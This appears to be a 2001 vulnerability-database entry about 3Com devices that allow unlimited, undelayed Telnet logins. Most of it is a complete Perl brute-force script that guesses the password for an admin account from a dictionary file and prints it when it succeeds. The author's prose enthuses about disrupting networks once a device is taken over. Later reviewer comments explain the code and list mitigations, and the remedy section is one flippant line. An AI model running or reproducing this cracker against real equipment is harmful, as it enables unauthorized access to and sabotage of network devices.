Vulnerability 3COM Affected 3COM Description "Siberian" found the following. He noticed that 3Com hardware allows an unlimited number of login retries and enforces no delay between them, so he wrote this little Telnet cracker for this problem. He sent it to 3Com. This should work for most 3Com hardware with Telnet config enabled. It was tested with a PS40 SuperStack II and it worked fine. Tips and suggestions welcome. It's really fun to crack into network hardware; imagine all the nice features most devices support... enabling ports, slowing down the network, building loops... By the way, this one needs a dictionary file.
#!/usr/bin/perl -w ######################################################## # # # 3Com Telnet Cracker v0.1b # # ------------------------- # # # # Telnet implementation arcording to RFC 854 # # # # written 2001 by Siberian [www.sentry-labs.com] # # # # Tested with: # # Active Perl (Windows NT) # # Perl 5.stable (Slackware 3.6 & 7.1) # # # # This Software is published under GPL v2 # # # # FOR EDUCATIONAL PURPOUSE ONLY! # # # # SRL can't be held responsible for any damgae caused # # by the software, direct or inderectly to anything # # or anyone. 
# # # ########################################################

# Review notes on the listing below (defender's view):
#   * The script opens ONE TCP connection to port 23 of the host named on the
#     command line and submits every line of a dictionary file as the password
#     for a single user name ("admin" unless a third argument is given).
#   * Nothing in the script sleeps or backs off between attempts; it depends on
#     the device accepting unlimited, undelayed login attempts, which is the
#     weakness the advisory text describes.
#   * On the wire this is one long-lived Telnet session carrying a rapid series
#     of login attempts. NOTE(review): the page does not show what the device
#     logs; where failed Telnet logins are recorded per source, expect a burst
#     of failures from one address.
#   * General mitigations (not stated on the page): a long, non-dictionary
#     password, limiting which hosts can reach the Telnet management interface,
#     and disabling Telnet management where it is not needed.
use Socket;

# guesspass - run the login dialogue over the already-connected socket SOCK.
#
# Takes no arguments. It works entirely on package globals prepared by the main
# program: $userf (user name), FILE1 (open dictionary file handle) and SOCK
# (connected socket).
#
# Device output is read one byte at a time and only three characters are acted
# on: "L", "P" and "M". NOTE(review): presumably these are the first letters of
# the login, password and menu prompts -- the page does not show the device
# output, so confirm against a real session.
#
# On an "M" marker the sub prints the user name and password and calls exit 0
# itself. If the dictionary runs out it prints a failure message and returns.
sub guesspass {
    $i=1;                                          # exchange counter for the inner loop
    $userh = $userf;                               # keep the bare user name for the final report
    $userf = join '', $userf, chr(13), chr(10);    # append CR LF so the name is sent as a full line

    # Discard output byte by byte until the first marker character arrives.
    recv(SOCK,$ol,1,0);
    while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); }

    # One pass per dictionary line; there is no delay between passes.
    while(defined($passwd = <FILE1>)) {
        chop($passwd);                             # drops the last character of the line unconditionally
        print ".";                                 # progress indicator, one dot per candidate

        # Runs for $i == 1 and $i == 2, i.e. two marker/response exchanges per
        # candidate (presumably one for the user name, one for the password).
        while($i != 3) {
            # Answer according to the marker seen last.
            if($ol eq "L"){ send(SOCK,$userf,0); }
            # CR LF is appended to $passwd in place before it is sent.
            if($ol eq "P") { $passwd = join '', $passwd, chr(13), chr(10); send(SOCK,$passwd,0); }

            # Read up to the next marker character.
            recv(SOCK,$ol,1,0);
            while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){ recv(SOCK,$ol,1,0); }

            # "M" is treated as a successful login: report and end the program.
            if($ol eq "M") { print "\n\nPassword for $userh is $passwd\n"; exit 0; }
            $i++
        }
        $i=1;                                      # reset the counter for the next candidate
    }
    print "\n\nIt's sad but true, you failed.\n";
}

# ---- main program ----------------------------------------------------------
print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";

# Positional arguments: host, dictionary file, optional user name.
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$userf = shift || ($userf = "admin");              # falls back to "admin" when no user name is given

# Resolve the host and build a TCP socket address; the port is fixed at 23 (Telnet).
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";

# NOTE(review): two-argument open on a command-line value; Perl takes the open
# mode from the string itself in this form. The three-argument form avoids that.
open(FILE1, "$passf") || die "Can't open Password list!";

# Read one byte from the device, then send LF CR LF.
# NOTE(review): presumably this makes the device show its login prompt -- the
# page does not say; confirm.
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);

guesspass();

# Reached only when guesspass() returns, i.e. no candidate produced an "M" marker.
close(FILE1);
close(SOCK);
exit 0;

Solution Well, password should be random and good one, right?